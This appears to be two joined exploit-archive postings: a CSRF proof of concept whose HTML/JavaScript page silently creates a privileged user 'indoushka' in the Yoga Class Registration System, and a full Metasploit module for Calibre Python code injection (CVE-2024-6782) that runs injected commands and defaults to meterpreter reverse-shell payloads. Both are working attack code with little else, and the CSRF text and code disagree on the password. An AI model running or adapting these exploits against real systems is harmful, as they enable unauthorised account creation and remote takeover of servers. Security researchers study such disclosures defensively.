<pre><code>=============================================================================================================================================<br />| # Title : Yoga Class Registration System v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ycrs.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following JavaScript code :<br /><br /> creating a POST request using JavaScript to send certain data to a local server via HTTP. Here are the key points:<br /><br />[+] Create an XMLHttpRequest object:<br /><br /> xhr = new XMLHttpRequest(); Creates an XMLHttpRequest object that is used to send requests to the server.<br /><br />[+] Open the request:<br /><br /> xhr.open("POST", "http://127.0.0.1/php-ycrs/classes/Users.php?f=save", true); Opens a connection to the specified URL (in this case, a local server) using the HTTP method "POST".<br /><br />[+] Set the request headers:<br /><br /> xhr.setRequestHeader("Accept", "*/*"); Specifies that the request accepts any type of response.<br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); Specifies that the request accepts responses in English.<br /> xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------"); Specifies the content type of the request as multipart/form-data with specified boundaries.<br /><br />[+] Enable sending cookies:<br /><br /> xhr.withCredentials = true; Specifies that cookies should be sent with the request.<br /><br />[+] Setting up the request data:<br /><br /> The body is set up using a string containing the form data parts. Each part contains information such as username, password, and type.<br /><br /> This string is converted to a Uint8Array and then to a Blob to be sent.<br /><br />[+] Sending the request:<br /><br /> xhr.send(new Blob([aBody])); Sends the data to the server.<br /><br />[+] User Interface:<br /> There is a button inside the HTML form that calls the submitRequest() function when clicked, which executes the request.<br /><br />[+] Go to the line 6. Set the target site link Save changes and apply . <br /><br />[+] infected file : Users.php.<br /><br />[+] Line 15 : Choose a name "indoushka".<br /><br />[+] Line 19 : Choose a pass "Hacked".<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html> <br /><html> <br /><body><br /> <script> function submitRequest() <br /> { var xhr = new XMLHttpRequest(); <br /> xhr.open("POST", "http:\/\/127.0.0.1\/php-ycrs\/classes\/Users.php?f=save", true); <br /> xhr.setRequestHeader("Accept", "*\/*"); <br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br /> xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");<br /> xhr.withCredentials = true; <br /> var body =<br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"username\"\r\n" + <br /> "\r\n" + <br /> "indoushka\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"password\"\r\n" + <br /> "\r\n" + <br /> "H\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"type\"\r\n" + <br /> "\r\n" + <br /> "1\r\n" + <br /> "-------------------------------\r\n"; <br /> var aBody = new Uint8Array(body.length); <br /> for (var i = 0; i < aBody.length; i++) <br /> aBody[i] = body.charCodeAt(i); <br /> xhr.send(new Blob([aBody])); <br /> }<br /> </script><br /> <form action="#"><br /> <input type="button" value="Submit request" onclick="submitRequest();" /><br /> </form> <br /> </body> <br /> </html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Calibre Python Code Injection (CVE-2024-6782)',<br /> 'Description' => %q{<br /> This module exploits a Python code injection vulnerability in the Content Server component of Calibre v6.9.0 - v7.15.0. Once enabled (disabled by default), it will listen in its default configuration on all network interfaces on TCP port 8080 for incoming traffic, and does not require any authentication. The injected payload will get executed in the same context under which Calibre is being executed.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Amos Ng', # Discovery & PoC<br /> 'Michael Heinzl', # MSF exploit<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://starlabs.sg/advisories/24/24-6782'],<br /> [ 'CVE', '2024-6782']<br /> ],<br /> 'DisclosureDate' => '2024-07-31',<br /> 'Platform' => ['win', 'linux', 'unix'],<br /> 'Arch' => [ ARCH_CMD ],<br /><br /> 'Payload' => {<br /> 'BadChars' => '\\'<br /> },<br /><br /> 'Targets' => [<br /> [<br /> 'Windows_Fetch',<br /> {<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Platform' => 'win',<br /> 'DefaultOptions' => {<br /> 'FETCH_COMMAND' => 'CURL',<br /> 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'<br /> },<br /> 'Type' => :win_fetch<br /> }<br /> ],<br /> [<br /> 'Linux Command',<br /> {<br /> 'Platform' => [ 'unix', 'linux' ],<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :nix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /><br /> ],<br /> 'DefaultTarget' => 0,<br /><br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8080)<br /> ]<br /> )<br /> end<br /><br /> def check<br /> begin<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path)<br /> })<br /> rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError<br /> return CheckCode::Unknown<br /> end<br /><br /> if res && res.code == 200<br /> data = res.body.to_s<br /> pattern = /CALIBRE_VERSION\s*=\s*"([^"]+)"/<br /><br /> version = data.match(pattern)<br /><br /> if version[1].nil?<br /> return CheckCode::Unknown<br /> else<br /> vprint_status('Version retrieved: ' + version[1].to_s)<br /> end<br /><br /> if Rex::Version.new(version[1]).between?(Rex::Version.new('6.9.0'), Rex::Version.new('7.15.0'))<br /> return CheckCode::Appears<br /> else<br /> return CheckCode::Safe<br /> end<br /> else<br /> return CheckCode::Unknown<br /> end<br /> end<br /><br /> def exploit<br /> execute_command(payload.encoded)<br /> end<br /><br /> def execute_command(cmd)<br /> print_status('Sending payload...')<br /> exec_calibre(cmd)<br /> print_status('Exploit finished, check thy shell.')<br /> end<br /><br /> def exec_calibre(cmd)<br /> payload = '['\<br /> '["template"], '\<br /> '"", '\<br /> '"", '\<br /> '"", '\<br /> '1,'\<br /> '"python:def evaluate(a, b):\\n '\<br /> 'import subprocess\\n '\<br /> 'try:\\n '\<br /> "return subprocess.check_output(['cmd.exe', '/c', '#{cmd}']).decode()\\n "\<br /> 'except Exception:\\n '\<br /> "return subprocess.check_output(['sh', '-c', '#{cmd}']).decode()\""\<br /> ']'<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'ctype' => 'application/json',<br /> 'data' => payload,<br /> 'uri' => normalize_uri(target_uri.path, 'cdb/cmd/list')<br /> })<br /><br /> if res && res.code == 200<br /> print_good('Command successfully executed, check your shell.')<br /> elsif res && res.code == 400<br /> fail_with(Failure::UnexpectedReply, 'Server replied with a Bad Request response.')<br /> end<br /> end<br /><br />end<br /></code></pre>
